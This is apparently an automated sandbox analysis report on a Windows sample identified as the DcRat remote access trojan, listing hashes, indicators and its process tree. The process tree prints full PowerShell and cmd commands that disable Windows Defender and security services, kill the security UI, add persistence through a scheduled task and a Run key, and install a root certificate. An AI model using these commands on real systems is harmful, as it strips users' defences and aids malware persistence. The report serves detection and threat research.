Analysis
-
max time kernel
149s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
14-05-2024 11:55
Static task
static1
Behavioral task
behavioral1
Sample
c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe
Resource
win10v2004-20240508-en
General
-
Target
c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe
-
Size
2.4MB
-
MD5
c564138a5dfe37ca9392c0ed3722bb10
-
SHA1
b859f2931678370ec7323284c48ee84420403dc6
-
SHA256
f4abbf4717010d698712c6f85944d73755d0fc30a60844fc6d0c9d86822cca38
-
SHA512
d0f92d165a455d838e9ffe83d4b8d5843ef65315ff2fe151bfebe6a09d1c8b8be842c797000fc46238a37f76b137bd6d491a84b7cd84e2412d96337cab9a6deb
-
SSDEEP
24576:XF/Qs4a9rtQ/D5ey/A5m27P8fIeWRvtuEpjgbnvPQN5vYB9n5g9U0MOMJwPQ+3oS:XF6KNjgZwQ+33e76
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies security service 2 TTPs 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4" powershell.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4" powershell.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4" powershell.exe -
Processes:
resource yara_rule behavioral1/memory/2908-55-0x0000000005060000-0x00000000050C6000-memory.dmp dcrat -
Executes dropped EXE 2 IoCs
Processes:
UpdateWeb2View.exeNetTraceAgent.exepid process 2908 UpdateWeb2View.exe 2204 NetTraceAgent.exe -
Loads dropped DLL 2 IoCs
Processes:
cmd.execmd.exepid process 2868 cmd.exe 2232 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
UpdateWeb2View.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\WBEMAgent = "C:\\Users\\Admin\\AppData\\Roaming\\WBEM\\wbemagents.exe" UpdateWeb2View.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 ipinfo.io 5 ipinfo.io -
Drops file in Program Files directory 2 IoCs
Processes:
UpdateWeb2View.exedescription ioc process File created C:\Program Files\Internet Explorer\ieupdates.exe UpdateWeb2View.exe File opened for modification C:\Program Files\Internet Explorer\ieupdates.exe UpdateWeb2View.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 2748 taskkill.exe 2880 taskkill.exe -
Processes:
UpdateWeb2View.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 UpdateWeb2View.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 UpdateWeb2View.exe -
Suspicious behavior: EnumeratesProcesses 62 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeUpdateWeb2View.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2376 powershell.exe 2956 powershell.exe 2528 powershell.exe 2896 powershell.exe 1736 powershell.exe 2908 UpdateWeb2View.exe 2908 UpdateWeb2View.exe 2908 UpdateWeb2View.exe 2908 UpdateWeb2View.exe 2908 UpdateWeb2View.exe 1052 powershell.exe 2908 UpdateWeb2View.exe 1088 powershell.exe 1192 powershell.exe 2908 UpdateWeb2View.exe 1432 powershell.exe 1112 powershell.exe 448 powershell.exe 1508 powershell.exe 2432 powershell.exe 3000 powershell.exe 1920 powershell.exe 2164 powershell.exe 2364 powershell.exe 2956 powershell.exe 2172 powershell.exe 2908 UpdateWeb2View.exe 2908 UpdateWeb2View.exe 2908 UpdateWeb2View.exe 2908 UpdateWeb2View.exe 2908 UpdateWeb2View.exe 2908 UpdateWeb2View.exe 2908 UpdateWeb2View.exe 2908 UpdateWeb2View.exe 1032 powershell.exe 324 powershell.exe 1256 powershell.exe 2444 powershell.exe 1684 powershell.exe 536 powershell.exe 1844 powershell.exe 1292 powershell.exe 1760 powershell.exe 692 powershell.exe 2068 powershell.exe 2860 powershell.exe 2924 powershell.exe 1124 powershell.exe 2932 powershell.exe 1968 powershell.exe 1548 powershell.exe 764 powershell.exe 2828 powershell.exe 652 powershell.exe 528 powershell.exe 1140 powershell.exe 1640 powershell.exe 900 powershell.exe 872 powershell.exe 2872 powershell.exe 1528 powershell.exe 1244 powershell.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
Processes:
powershell.exepowershell.exetaskkill.exepowershell.exetaskkill.exepowershell.exepowershell.exeUpdateWeb2View.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2376 powershell.exe Token: SeDebugPrivilege 2956 powershell.exe Token: SeDebugPrivilege 2748 taskkill.exe Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 2880 taskkill.exe Token: SeDebugPrivilege 2896 powershell.exe Token: SeDebugPrivilege 1736 powershell.exe Token: SeDebugPrivilege 2908 UpdateWeb2View.exe Token: SeDebugPrivilege 1052 powershell.exe Token: SeDebugPrivilege 1088 powershell.exe Token: SeDebugPrivilege 1192 powershell.exe Token: SeDebugPrivilege 1432 powershell.exe Token: SeDebugPrivilege 1112 powershell.exe Token: SeDebugPrivilege 448 powershell.exe Token: SeDebugPrivilege 1508 powershell.exe Token: SeDebugPrivilege 2432 powershell.exe Token: SeDebugPrivilege 3000 powershell.exe Token: SeDebugPrivilege 1920 powershell.exe Token: SeDebugPrivilege 2164 powershell.exe Token: SeDebugPrivilege 2364 powershell.exe Token: SeDebugPrivilege 2956 powershell.exe Token: SeDebugPrivilege 2172 powershell.exe Token: SeDebugPrivilege 1032 powershell.exe Token: SeDebugPrivilege 324 powershell.exe Token: SeDebugPrivilege 1256 powershell.exe Token: SeDebugPrivilege 2444 powershell.exe Token: SeDebugPrivilege 1684 powershell.exe Token: SeDebugPrivilege 536 powershell.exe Token: SeDebugPrivilege 1844 powershell.exe Token: SeDebugPrivilege 1292 powershell.exe Token: SeDebugPrivilege 1760 powershell.exe Token: SeDebugPrivilege 692 powershell.exe Token: SeDebugPrivilege 2068 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeDebugPrivilege 2924 powershell.exe Token: SeDebugPrivilege 1124 powershell.exe Token: SeDebugPrivilege 2932 powershell.exe Token: SeDebugPrivilege 1968 powershell.exe Token: SeDebugPrivilege 1548 powershell.exe Token: SeDebugPrivilege 764 powershell.exe Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 652 powershell.exe Token: SeDebugPrivilege 528 powershell.exe Token: SeDebugPrivilege 1140 powershell.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 900 powershell.exe Token: SeDebugPrivilege 872 powershell.exe Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 1244 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1492 wrote to memory of 2408 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2408 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2408 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2408 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 2408 wrote to memory of 2376 2408 cmd.exe powershell.exe PID 2408 wrote to memory of 2376 2408 cmd.exe powershell.exe PID 2408 wrote to memory of 2376 2408 cmd.exe powershell.exe PID 2408 wrote to memory of 2376 2408 cmd.exe powershell.exe PID 1492 wrote to memory of 3004 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 3004 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 3004 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 3004 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 3004 wrote to memory of 2956 3004 cmd.exe powershell.exe PID 3004 wrote to memory of 2956 3004 cmd.exe powershell.exe PID 3004 wrote to memory of 2956 3004 cmd.exe powershell.exe PID 3004 wrote to memory of 2956 3004 cmd.exe powershell.exe PID 1492 wrote to memory of 2812 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2812 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2812 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2812 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 2812 wrote to memory of 2748 2812 cmd.exe taskkill.exe PID 2812 wrote to memory of 2748 2812 cmd.exe taskkill.exe PID 2812 wrote to memory of 2748 2812 cmd.exe taskkill.exe PID 2812 wrote to memory of 2748 2812 cmd.exe taskkill.exe PID 1492 wrote to memory of 2652 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2652 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2652 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2652 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 2652 wrote to memory of 2528 2652 cmd.exe powershell.exe PID 2652 wrote to memory of 2528 2652 cmd.exe powershell.exe PID 2652 wrote to memory of 2528 2652 cmd.exe powershell.exe PID 2652 wrote to memory of 2528 2652 cmd.exe powershell.exe PID 1492 wrote to memory of 2600 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2600 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2600 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2600 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 2600 wrote to memory of 2880 2600 cmd.exe taskkill.exe PID 2600 wrote to memory of 2880 2600 cmd.exe taskkill.exe PID 2600 wrote to memory of 2880 2600 cmd.exe taskkill.exe PID 2600 wrote to memory of 2880 2600 cmd.exe taskkill.exe PID 1492 wrote to memory of 1676 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 1676 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 1676 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 1676 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1676 wrote to memory of 2896 1676 cmd.exe powershell.exe PID 1676 wrote to memory of 2896 1676 cmd.exe powershell.exe PID 1676 wrote to memory of 2896 1676 cmd.exe powershell.exe PID 1676 wrote to memory of 2896 1676 cmd.exe powershell.exe PID 1492 wrote to memory of 2868 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2868 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2868 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2868 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 2868 wrote to memory of 2908 2868 cmd.exe UpdateWeb2View.exe PID 2868 wrote to memory of 2908 2868 cmd.exe UpdateWeb2View.exe PID 2868 wrote to memory of 2908 2868 cmd.exe UpdateWeb2View.exe PID 2868 wrote to memory of 2908 2868 cmd.exe UpdateWeb2View.exe PID 2868 wrote to memory of 2908 2868 cmd.exe UpdateWeb2View.exe PID 2868 wrote to memory of 2908 2868 cmd.exe UpdateWeb2View.exe PID 2868 wrote to memory of 2908 2868 cmd.exe UpdateWeb2View.exe PID 1492 wrote to memory of 2368 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2368 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2368 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2368 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe PID 1492 wrote to memory of 2232 1492 c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe"C:\Users\Admin\AppData\Local\Temp\c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell Set-MpPreference -MAPSReporting 0 >nul2⤵
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -MAPSReporting 03⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell Set-MpPreference -MAPSReporting Disabled >nul2⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -MAPSReporting Disabled3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im SecHealthUI.exe >nul 2>nul2⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SecHealthUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell Set-MpPreference -UiLockDown 1 >nul 2>nul2⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -UiLockDown 13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im SecHealthUI.exe >nul 2>nul2⤵
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SecHealthUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell Set-MpPreference -SubmitSamplesConsent 0 >nul2⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -SubmitSamplesConsent 03⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start "" "C:\ProgramData\Microsoft\Windows\Caches\UpdateWeb2View.exe" >nul2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\ProgramData\Microsoft\Windows\Caches\UpdateWeb2View.exe"C:\ProgramData\Microsoft\Windows\Caches\UpdateWeb2View.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo >nul2⤵PID:2368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start /b "" "C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe" >nul2⤵
- Loads dropped DLL
PID:2232 -
C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe"C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe"3⤵
- Executes dropped EXE
PID:2204 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disabled4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 04⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMnitoring $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1432
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -UILockdown $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1112
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableRealtimeMonitoring -Value 1 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\SecurityHealthService' -Name Start -Value 4 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\wscsvc' -Name Start -Value 4 -PropertyType DWORD -Force"4⤵
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableBehaviorMonitoring -Value 1 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1920
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableOnAccessProtection -Value 1 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableScanOnRealtimeEnable -Value 1 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $True4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$action=New-ScheduledTaskAction -Execute 'C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe'; $trigger = @(New-ScheduledTaskTrigger -AtStartup; New-ScheduledTaskTrigger -AtLogon); $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -DisallowHardTerminate -ExecutionTimeLimit ([TimeSpan]::FromDays(999)); Register-ScheduledTask -TaskName 'NetTraceInfoTask' -taskPath '\Microsoft\Windows\NetTrace' -Action $action -Trigger $trigger -Settings $settings -RunLevel Highest -Description 'Task that checks the NET connection trace.';"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disabled4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:324
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 04⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMnitoring $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -UILockdown $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:536
-
-
